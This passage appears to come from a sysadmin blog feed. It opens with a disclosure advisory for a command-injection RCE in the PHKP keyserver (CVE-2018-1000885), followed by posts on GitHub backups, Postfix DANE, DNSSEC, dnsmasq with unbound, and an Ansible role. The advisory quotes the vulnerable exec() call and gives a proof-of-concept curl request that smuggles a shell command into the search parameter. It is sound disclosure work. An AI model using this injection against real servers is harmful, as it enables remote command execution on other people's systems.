arguments="0=node&amp;1=275&amp;2=comment&amp;3=comment" token="n9usVfEUtf7byg_DtY0U2-fcm665S_LxRZ3k1aaN8cE"></drupal-render-placeholder> </section> Mon, 14 Jan 2019 20:06:52 +0000 Hoti 275 at https://tech.feedyourhead.at Full Disclosure: Remote-Command-Execution in PHKP https://tech.feedyourhead.at/content/full-disclosure-remote-command-execution-in-phkp <span class="field field--name-title field--type-string field--label-hidden">Full Disclosure: Remote-Command-Execution in PHKP</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><h3>Overview</h3> <ul><li>System affected: <a href="https://el-tramo.be/phkp/">PHKP</a></li> <li>Software-Version: including commit <span class="sha-block"><span class="sha user-select-contain">88fd9cfdf14ea4b6ac3e3967feea7bcaabb6f03b</span></span></li> <li>User-Interaction: Not required</li> <li>Impact: Remote-Code-Execution</li> <li>CVE: CVE-2018-1000885</li> </ul><h3>Detailed Description</h3> <p>According to the project-page "PHKP is an implementation of the <a href="https://tools.ietf.org/html/draft-shaw-openpgp-hkp-00">OpenPGP HTTP Keyserver Protocol (HKP)</a> in PHP". Due to unsanitized query parameters in the <a href="https://tools.ietf.org/html/draft-shaw-openpgp-hkp-00#page-3">/pks/lookup-call</a> any shell-command can be injected and executed remotely.</p> <p>In line <a href="https://github.com/remko/phkp/blob/88fd9cfdf14ea4b6ac3e3967feea7bcaabb6f03b/phkp.php#L106-L107">106 of phkp.php the search-parameter "/pks/lookup&amp;op=index" is assigned without any checks and in line 107</a> this variable will be used as a parameter of exec():</p> <div class="geshifilter"><pre class="php geshifilter-php" style="font-family:monospace;">  <span style="color: #000088;">$search</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$vars</span><span style="color: #009900;">[</span><span style="color: #0000ff;">'search'</span><span style="color: #009900;">]</span><span style="color: #339933;">;</span> <span style="color: #000088;">$pgp_result</span> <span style="color: #339933;">=</span> pgp_exec<span style="color: #009900;">(</span><span style="color: #0000ff;">"--list-public-keys --list-keys <span style="color: #006699; font-weight: bold;">$search</span>"</span><span style="color: #339933;">,</span> <span style="color: #000088;">$output</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span> </pre></div> <p>It is possible to inject any shell commands using the search-parameter:</p> <p><span class="geshifilter"><code class="bash geshifilter-bash">curl http:<span style="color: #000000; font-weight: bold;">//</span>localhost:<span style="color: #000000;">8008</span><span style="color: #000000; font-weight: bold;">/</span>pks<span style="color: #000000; font-weight: bold;">/</span>lookup?<span style="color: #007800;">op</span>=index<span style="color: #000000; font-weight: bold;">&amp;</span><span style="color: #007800;">search</span>=js<span style="color: #000000; font-weight: bold;">@</span>example.com; <span style="color: #c20cb9; font-weight: bold;">id</span></code></span></p> <p>In line <a href="https://github.com/remko/phkp/blob/88fd9cfdf14ea4b6ac3e3967feea7bcaabb6f03b/phkp.php#L116-L117">116 and 117</a> the same problem occurs again for the "/pks/lookup&amp;op=get"-call. That means that the remote-code-execution occurs in two places.</p> <h3>Proof-Of-Concept</h3> <p>A ordinary lookup coud be the following:</p> <p><img alt="Normal phkp-lookup" data-entity-type="file" data-entity-uuid="83e75e46-8ca9-4cfe-a717-ca2535521734" src="/sites/default/files/inline-images/2018-10-08-13%3A14%3A35.png" /></p> <p>By injecting shell commands to the search-parameter, it is possible to execute any command:</p> <p><img alt="phkp rce" data-entity-type="file" data-entity-uuid="ba2c925d-adac-4faf-a1bb-d5477140702e" src="/sites/default/files/inline-images/phkp-rce.png" /></p> <h3>Mitigation</h3> <p>Currently there is no fix for this bug. The <a href="https://github.com/remko/phkp/issues/1">author was informed on Jul 18 2018</a>. A solution for this problem might be the <a href="http://php.net/manual/en/function.escapeshellcmd.php">escapeshellcmd()-function</a>.</p> <h3>Credits</h3> <p>The remote-code-execution bug was discovered by Wolfgang Hotwagner(https://tech.feedyourhead.at/content/full-disclosure-remote-command-execution-in-phkp)</p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Oct 08 2018</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=270&amp;2=comment&amp;3=comment" token="cK_p_W5RhnZKxZrNTKP6lTqyEefrgqU5bitXNJBBEVM"></drupal-render-placeholder> </section> Mon, 08 Oct 2018 11:23:39 +0000 Hoti 270 at https://tech.feedyourhead.at Happy Sysadminday https://tech.feedyourhead.at/content/sysadminday2018 <span class="field field--name-title field--type-string field--label-hidden">Happy Sysadminday</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Sysadmins are the heros who bring back our cat-pictures from the heights of the filesystem-tree. So let's honour our firefighters of the internet.</p></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Jul 27 2018</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/news" hreflang="en">News</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=268&amp;2=comment&amp;3=comment" token="Wssl8ZtZSOX4u3ylGkaWHQxezQssIMaRhR4OT18LOm8"></drupal-render-placeholder> </section> Fri, 27 Jul 2018 08:12:55 +0000 Hoti 268 at https://tech.feedyourhead.at Now is a good time to backup our github-repos https://tech.feedyourhead.at/content/now-is-a-good-time-to-backup-our-github-repos <span class="field field--name-title field--type-string field--label-hidden">Now is a good time to backup our github-repos</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Many people are scared because <a href="https://news.microsoft.com/2018/06/04/microsoft-to-acquire-github-for-7-5-billion/">Microsoft bought GitHub</a>. I wonder why people are so shocked now. Github is just another cloud-thingy and cloud means: "it's just the computer of someone else". If "someone else" will shutdown or wipe his computer, then we better have backups. Having this in our minds I would say that it's time to make (auto)backups. I wrote this little ruby-script that clones all public repositories of a user into a directory. If the repositories already exist locally, then this script will just make a "git-pull".</p> <div class="geshifilter"><pre class="ruby geshifilter-ruby" style="font-family:monospace;"><span style="color:#008000; font-style:italic;">#!/usr/bin/env ruby</span> &nbsp; <span style="color:#CC0066; font-weight:bold;">require</span> <span style="color:#996600;">'net/http'</span> <span style="color:#CC0066; font-weight:bold;">require</span> <span style="color:#996600;">'json'</span> <span style="color:#CC0066; font-weight:bold;">require</span> <span style="color:#996600;">'fileutils'</span> &nbsp; directory = <span style="color:#996600;">&quot;./&quot;</span> &nbsp; <span style="color:#9966CC; font-weight:bold;">def</span> help warn <span style="color:#996600;">&quot;usage: #{$PROGRAM_NAME} &lt;github-user&gt; [ &lt;dst-directory&gt; ]&quot;</span> <span style="color:#CC0066; font-weight:bold;">exit</span> <span style="color:#006666;">1</span> <span style="color:#9966CC; font-weight:bold;">end</span> &nbsp; <span style="color:#008000; font-style:italic;"># got this function from stackoverflow.com: </span> <span style="color:#008000; font-style:italic;"># stackoverflow.com/questions/2108727/which-in-ruby-checking-if-program-exists-in-path-from-ruby</span> <span style="color:#9966CC; font-weight:bold;">def</span> which<span style="color:#006600; font-weight:bold;">&#40;</span>cmd<span style="color:#006600; font-weight:bold;">&#41;</span> exts = ENV<span style="color:#006600; font-weight:bold;">&#91;</span><span style="color:#996600;">'PATHEXT'</span><span style="color:#006600; font-weight:bold;">&#93;</span> ? ENV<span style="color:#006600; font-weight:bold;">&#91;</span><span style="color:#996600;">'PATHEXT'</span><span style="color:#006600; font-weight:bold;">&#93;</span>.<span style="color:#CC0066; font-weight:bold;">split</span><span style="color:#006600; font-weight:bold;">&#40;</span><span style="color:#996600;">';'</span><span style="color:#006600; font-weight:bold;">&#41;</span> : <span style="color:#006600; font-weight:bold;">&#91;</span><span style="color:#996600;">''</span><span style="color:#006600; font-weight:bold;">&#93;</span> ENV<span style="color:#006600; font-weight:bold;">&#91;</span><span style="color:#996600;">'PATH'</span><span style="color:#006600; font-weight:bold;">&#93;</span>.<span style="color:#CC0066; font-weight:bold;">split</span><span style="color:#006600; font-weight:bold;">&#40;</span><span style="color:#CC00FF; font-weight:bold;">File</span>::PATH_SEPARATOR<span style="color:#006600; font-weight:bold;">&#41;</span>.<span style="color:#9900CC;">each</span> <span style="color:#9966CC; font-weight:bold;">do</span> <span style="color:#006600; font-weight:bold;">|</span>path<span style="color:#006600; font-weight:bold;">|</span> exts.<span style="color:#9900CC;">each</span> <span style="color:#006600; font-weight:bold;">&#123;</span> <span style="color:#006600; font-weight:bold;">|</span>ext<span style="color:#006600; font-weight:bold;">|</span> exe = <span style="color:#CC00FF; font-weight:bold;">File</span>.<span style="color:#9900CC;">join</span><span style="color:#006600; font-weight:bold;">&#40;</span>path, <span style="color:#996600;">&quot;#{cmd}#{ext}&quot;</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#0000FF; font-weight:bold;">return</span> exe <span style="color:#9966CC; font-weight:bold;">if</span> <span style="color:#CC00FF; font-weight:bold;">File</span>.<span style="color:#9900CC;">executable</span>?<span style="color:#006600; font-weight:bold;">&#40;</span>exe<span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#006600; font-weight:bold;">&amp;&amp;</span> !<span style="color:#CC00FF; font-weight:bold;">File</span>.<span style="color:#9900CC;">directory</span>?<span style="color:#006600; font-weight:bold;">&#40;</span>exe<span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#006600; font-weight:bold;">&#125;</span> <span style="color:#9966CC; font-weight:bold;">end</span> <span style="color:#0000FF; font-weight:bold;">return</span> <span style="color:#0000FF; font-weight:bold;">nil</span> <span style="color:#9966CC; font-weight:bold;">end</span> &nbsp; gitbin = which<span style="color:#006600; font-weight:bold;">&#40;</span><span style="color:#996600;">&quot;git&quot;</span><span style="color:#006600; font-weight:bold;">&#41;</span> &nbsp; <span style="color:#9966CC; font-weight:bold;">if</span> gitbin.<span style="color:#0000FF; font-weight:bold;">nil</span>? warn <span style="color:#996600;">&quot;git-binary not found&quot;</span> <span style="color:#CC0066; font-weight:bold;">exit</span> <span style="color:#006666;">1</span> <span style="color:#9966CC; font-weight:bold;">end</span> &nbsp; <span style="color:#9966CC; font-weight:bold;">if</span> ARGV.<span style="color:#9900CC;">length</span> <span style="color:#006600; font-weight:bold;">&lt;</span> <span style="color:#006666;">1</span> <span style="color:#006600; font-weight:bold;">||</span> ARGV.<span style="color:#9900CC;">length</span> <span style="color:#006600; font-weight:bold;">&gt;</span> <span style="color:#006666;">2</span> help <span style="color:#9966CC; font-weight:bold;">end</span> &nbsp; gituser = ARGV<span style="color:#006600; font-weight:bold;">&#91;</span><span style="color:#006666;">0</span><span style="color:#006600; font-weight:bold;">&#93;</span> directory = ARGV<span style="color:#006600; font-weight:bold;">&#91;</span><span style="color:#006666;">1</span><span style="color:#006600; font-weight:bold;">&#93;</span> <span style="color:#9966CC; font-weight:bold;">if</span> ARGV.<span style="color:#9900CC;">length</span> == <span style="color:#006666;">2</span> &nbsp; <span style="color:#9966CC; font-weight:bold;">unless</span> <span style="color:#CC00FF; font-weight:bold;">File</span>.<span style="color:#9900CC;">directory</span>?<span style="color:#006600; font-weight:bold;">&#40;</span>directory<span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#CC00FF; font-weight:bold;">FileUtils</span>::mkdir_p directory <span style="color:#9966CC; font-weight:bold;">end</span> &nbsp; uri = <span style="color:#CC00FF; font-weight:bold;">URI</span><span style="color:#006600; font-weight:bold;">&#40;</span><span style="color:#996600;">&quot;https://api.github.com/users/#{gituser}/repos&quot;</span><span style="color:#006600; font-weight:bold;">&#41;</span> &nbsp; resp = <span style="color:#6666ff; font-weight:bold;">Net::HTTP</span>.<span style="color:#9900CC;">get</span><span style="color:#006600; font-weight:bold;">&#40;</span>uri<span style="color:#006600; font-weight:bold;">&#41;</span> parsed = JSON.<span style="color:#9900CC;">parse</span><span style="color:#006600; font-weight:bold;">&#40;</span>resp<span style="color:#006600; font-weight:bold;">&#41;</span> &nbsp; parsed.<span style="color:#9900CC;">each</span> <span style="color:#9966CC; font-weight:bold;">do</span> <span style="color:#006600; font-weight:bold;">|</span><span style="color:#CC0066; font-weight:bold;">p</span><span style="color:#006600; font-weight:bold;">|</span> <span style="color:#9966CC; font-weight:bold;">if</span> <span style="color:#CC00FF; font-weight:bold;">File</span>.<span style="color:#9900CC;">directory</span>?<span style="color:#006600; font-weight:bold;">&#40;</span><span style="color:#996600;">&quot;#{directory}/#{p['name']}&quot;</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#CC0066; font-weight:bold;">system</span><span style="color:#006600; font-weight:bold;">&#40;</span><span style="color:#996600;">&quot;cd #{directory}/#{p['name']} &amp;&amp; #{gitbin} pull&quot;</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#9966CC; font-weight:bold;">else</span> <span style="color:#CC0066; font-weight:bold;">system</span><span style="color:#006600; font-weight:bold;">&#40;</span><span style="color:#996600;">&quot;#{gitbin} clone https://github.com/#{p['full_name']} #{directory}/#{p['name']}&quot;</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#9966CC; font-weight:bold;">end</span> <span style="color:#9966CC; font-weight:bold;">end</span></pre></div> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Jun 07 2018</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/ruby" hreflang="en">Ruby</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/git" hreflang="en">git</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/103" hreflang="en">Open-Source</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/backup" hreflang="en">Backup</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/tricks" hreflang="en">Tricks</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/shell" hreflang="en">Shell</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=267&amp;2=comment&amp;3=comment" token="oPcbvqzYUcugBxbk0j0w2JLHdMWOfeGFn5WU98XCfbI"></drupal-render-placeholder> </section> Thu, 07 Jun 2018 10:41:24 +0000 Hoti 267 at https://tech.feedyourhead.at Postfix: verified TLS with DANE https://tech.feedyourhead.at/content/postfix-verified-tls-with-dane <span class="field field--name-title field--type-string field--label-hidden">Postfix: verified TLS with DANE</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>TLS via SMTP is <a href="https://en.wikipedia.org/wiki/Opportunistic_TLS">opportunistic</a> which makes connections vulnerable to man-in-the-middle-attacks. In order to prevent mitm-attacks, <a href="https://en.wikipedia.org/wiki/DNS-based_Authentication_of_Named_Entities">DANE</a> could be used. The sender-server will first check the domain-records if dnssec is in use(and valid) and if a TLSA-record is published(and valid). If a TLSA-record is valid and matches with the certificate of the recipient-server the connection could be encrypted and the encryption is verified. Postfix was one of the first smtp-servers that implemented DANE since the <a href="https://tools.ietf.org/id/draft-dukhovni-smtp-opportunistic-tls-00.html">author of the DANE protocol is a postfix-developer</a>. This article describes how to enable DANE in postfix.</p> <h3>Preconditions</h3> <p>It's very easy to enable DANE in postfix. First we have to ensure that postfix can resolve DNSsec queries. I recommend to install the dns-resolver "<a href="https://unbound.net/">unbound</a>" on the postfix-server. Unbound does DNSsec pretty well. It also automatically manages the trust-anchors for DNSsec. We can check if DNSsec works, if the "ad"-flag is set. So lets use dig to test it:</p> <pre> <code>&gt; DiG 9.9.5-9+deb8u15-Debian &lt;&lt;&gt;&gt; gov. +dnssec ;; global options: +cmd ;; Got answer: ;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 35764 ;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags: do; udp: 4096 ;; QUESTION SECTION: ;gov. IN A </code></pre> <p>As we can see, the "ad"-flag was set. If we use a resolver without dnssec-support it would look like that:</p> <pre> <code> % dig gov. +dnssec ; &lt;&lt;&gt;&gt; DiG 9.8.4-rpz2+rl005.12-P1 &lt;&lt;&gt;&gt; gov. +dnssec ;; global options: +cmd ;; Got answer: ;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: SERVFAIL, id: 25074 ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags: do; udp: 4000 ;; QUESTION SECTION: ;gov. IN A </code></pre> <p>As you can see, there is no "ad"-flag in this example. That indicates that DNSsec is not supported by the resolver.</p> <h3>Postfix-config</h3> <p>As soon as we set up a resolver with dnssec-support, we can easily enable DANE in postfix:</p> <pre> <code> # DANE-Settings smtp_dns_support_level=dnssec smtp_host_lookup=dns smtp_tls_security_level = dane smtp_tls_loglevel=1 </code></pre> <p>Now postfix will always try to verify the TLS-connection using DANE. If you just want to enable DANE for specific domains, I'll recommend have a look at the <a href="http://www.postfix.org/TLS_README.html#client_tls">example in the postfix-documentation</a>.</p> <h3>Test</h3> <p>We can test DANE by sending Emails to a server that has TLSA-Records. There is a list of domains with TLSA-records at the end of <a href="https://static.ptbl.co/static/attachments/169319/1520904692.pdf?1520904692">this pdf</a>. I just tested DANE by sending an email to a gmx.net-address:</p> <pre> <code> May 12 21:26:59 mymailserver postfix/smtp[3064]: Verified TLS connection established to mx01.emig.gmx.net[212.227.17.5]:25: TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits) </code></pre> <p>The keyword "Verified" indicates that the TLS-connection could be verified.</p> <p>&nbsp;</p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">May 14 2018</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/crypto" hreflang="en">Crypto</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/email" hreflang="en">Email</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/mail" hreflang="en">Mail</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=265&amp;2=comment&amp;3=comment" token="oDTTj6SHpFvGYUI319oXvKTZNvcKlQalAHTJrUNU044"></drupal-render-placeholder> </section> Mon, 14 May 2018 12:11:10 +0000 Hoti 265 at https://tech.feedyourhead.at Thoughts about DNSsec https://tech.feedyourhead.at/content/thoughts-about-dnssec <span class="field field--name-title field--type-string field--label-hidden">Thoughts about DNSsec</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p><a href="https://en.wikipedia.org/wiki/Domain_Name_System">DNS</a> is one of the oldest but also one of the most important network protocols we have and actively use. Dan Kaminsky discovered 2008 some <a href="https://www.kb.cert.org/vuls/id/800113">serious flaws</a> in DNS <a href="http://unixwiz.net/techtips/iguide-kaminsky-dns-vuln.html">which is very well explained on this site</a>. <a href="https://blog.cloudflare.com/dnssec-an-introduction/">DNSsec</a> is supposed to solve those problems.</p> <h3>Why don't we have it worldwide yet?</h3> <p>DNSsec uses a chain of trust and signed records. There are some problems with DNSsec too. One problem, for example, is that it doesn't protect against attacks from the governments. In conjunction with DANE, which could be a replacement for the existing Certificate-Authorities, DNSsec could make things <a href="https://sockpuppet.org/blog/2015/01/15/against-dnssec/">worser than it was before</a>.  Another problem is  that the records might get bigger and this makes it easier for attackers to abuse the <a href="https://www.computerworld.com/article/3097364/security/attackers-use-dnssec-amplification-to-launch-multi-vector-ddos-attacks.html">dns-servers for ddos-attacks</a>. In order to keep the records smaller, some DNS-servers  use <a href="https://www.cloudflare.com/dns/dnssec/ecdsa-and-dnssec/">elliptic curve-algorithms</a>. But elliptic curve-algorithms aren't supported widely and many tools still don't support records that are signed with elliptic curve-algorithms.</p> <h3>It's easy to monitor, right?</h3> <p>Talking about tools brings me to another thing that bothers me: there aren't much solid tools that work properly out there for Dnssec. It was very hard to find some monitoringtools or libraries that check if the Domain is signed correctly and when the keys do expire. I won't say that there are none, but it seems that there are a lot of broken tools out there. There are many reasons for that. Those tools have to speak DNS, DNSsec and all it's cryptographic algorithms. Some tools are old and don't compile anymore, or have weird dependencies. Some don't speak DNSsec directly and just utilize unbound. And some speak DNS and DNSsec but not with elliptic curve algorithms. I hope this situation changes soon.</p> <h3>Providers are familiar with DNSsec, right?</h3> <p>When I was activating DNSsec on my domain, I had to interact with my domain-provider. I realized that this provider has no standard procedure for DNSsec yet. There was no secure way to hand him over my keys(or hashes). That made me curious about the state of DNSsec in austrian companies. And I figured out that not many companies use DNSsec. Neither the biggest internet service providers nor the local banks have implemented DNSsec yet. I guess they might do that, as soon as Google starts using DNSsec(if it happens).</p> <h3>So why bother after all?</h3> <p>There are a couple of dns-records which solve some existing problems but require trusted domains. One of them is DANE/TLSA. Even if many SMTP-servers support TLS now, it still is opportunistic and they are vulnerable against Man-In-The-Middle-attacks. If people would have a trusted dns-zone, they could store the certificates(or fingerprints) as DNS-records and the other mailservers could validate the certificates. I believe this could be a good thing(as long as we trust the keys of the top-level domains). Since "email made in germany" has failed many german mail-provider(like web.de and gmx) use DANE. That's why I decided to give DNSsec a try.</p> <p> </p></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">May 08 2018</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/crypto" hreflang="en">Crypto</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/network" hreflang="en">Network</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=264&amp;2=comment&amp;3=comment" token="BkT2xG6szICCwLsMrGEzc3x_9jyQKcl2VUooQikCslE"></drupal-render-placeholder> </section> Tue, 08 May 2018 09:36:20 +0000 Hoti 264 at https://tech.feedyourhead.at What if dnsmasq and ubound marry? https://tech.feedyourhead.at/content/what-if-dnsmasq-and-unbound-marry <span class="field field--name-title field--type-string field--label-hidden">What if dnsmasq and ubound marry?</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p><a href="http://www.thekelleys.org.uk/dnsmasq/doc.html">Dnsmasq</a> is a great piece of software. Described in few words I would say that it is a dns-forwarder, dhcp-server and tftp-server. I like the way dnsmasq can be configured. A-Records can be created by simply adding entries in /etc/hosts and I define <a href="https://tech.feedyourhead.at/content/static-arp-cache-on-dhcp-servers">dhcp-hosts by adding lines in&nbsp; /etc/ethers</a>. But we live in very strange times. Google-DNS, Cloudflare-DNS and QUAD9 are open dns servers, but might spy on us(if a service is free to use in the internet, then we might not be the customer but the product). All the DNS-resolvers of our ISP aren't trustworthy either since the <a href="https://www.law.berkeley.edu/files/Wang_Faye_Fangfei_IPSC_paper_2014.pdf">EU already decided to force ISP's to block sites</a>. But blocking sites might not be the only problem. The one who controlls your dns-requests, is also able to route your traffic which could be used for Man-in-the-middle-attacks to gain control. So I decided to install a dns-recursor in my network. Dnsmasq does its jobs satisfyingly but it needs another dns-recursor. That's why I want to add a recursor and use it together with dnsmasq. A very handy dns-recursor is <a href="https://unbound.net/">unbound</a>. It's easy to configure and does <a href="https://en.wikipedia.org/wiki/Domain_Name_System_Security_Extensions">DNSsec</a>.</p> <h3>Preparing DNSmasq</h3> <p>In order to install DNSmasq and unbound on the same host I decided to bind the dns-port on 5353 instead of 53. Unbound will listen on port 53. DNSmasq is for custom DNS-Records only in this configuration.&nbsp; The following sample configuration will configure a dhcp-server that uses /etc/ethers and&nbsp; a dns-server that listens at port 5353 and resolves the domain "home.".</p> <p>/etc/dnsmasq.d/my.conf:</p> <pre> <code> port=5353 local=/home/ interface=br0 domain=home dhcp-range=br0,192.168.10.100,192.168.10.150,12h read-ethers dhcp-authoritative dhcp-option=6,192.168.10.1 </code></pre> <h3>Setting up unbound</h3> <p>If unbound is installed via Debian-packages, it is already configured for dnssec. So I just need to configure the forwarding of the "home."-domain:</p> <p>/etc/unbound/unbound.conf.d/my.conf:</p> <pre> <code> server: num-threads: 4 interface: 192.168.10.1 access-control: 192.168.10.0/24 allow private-domain: "home." domain-insecure: "home." local-zone: "home." nodefault forward-zone: name: "home." forward-addr: 192.168.10.1@5353 </code> </pre> <p>Restart dnsmasq and unbound and enjoy the recursor. With this setup, I can simply create home-dnsrecords by adding lines in /etc/hosts:</p> <pre> <code> 192.168.10.1 ns1.home 192.168.10.2 nas.home # ... </code></pre> <h3>Conclusio</h3> <p>Even if unbound could handle the home-domain by it's own, I prefer using /etc/hosts. Since a dhcp-server is needed anyway, I use dnsmasq for that. It's easy to setup and works perfectly.</p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Apr 11 2018</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/network" hreflang="en">Network</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=260&amp;2=comment&amp;3=comment" token="vFb8-iICYIh8a85JGjeyiCAXzX6jcB28pun_d-IrwGw"></drupal-render-placeholder> </section> Wed, 11 Apr 2018 08:52:30 +0000 Hoti 260 at https://tech.feedyourhead.at Managing MaraDNS with Ansible https://tech.feedyourhead.at/content/managing-maradns-with-ansible <span class="field field--name-title field--type-string field--label-hidden">Managing MaraDNS with Ansible</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>I wrote a <a href="https://github.com/whotwagner/ansible-role-maradns">role for managing MaraDNS with Ansible</a>.</p> <h3>Requirements</h3> <ul> <li>Ansible 2.1+ (might ork with prior versions too)</li> <li>Debian-based Linux-distribution</li> </ul> <h3>Installation</h3> <p><code>ansible-galaxy install whotwagner.maradns</code></p> <h3>Configuration Example</h3> <pre><code> maradns_zones: - name: example.com email: support@example.com spf: - { val: 'v=spf1 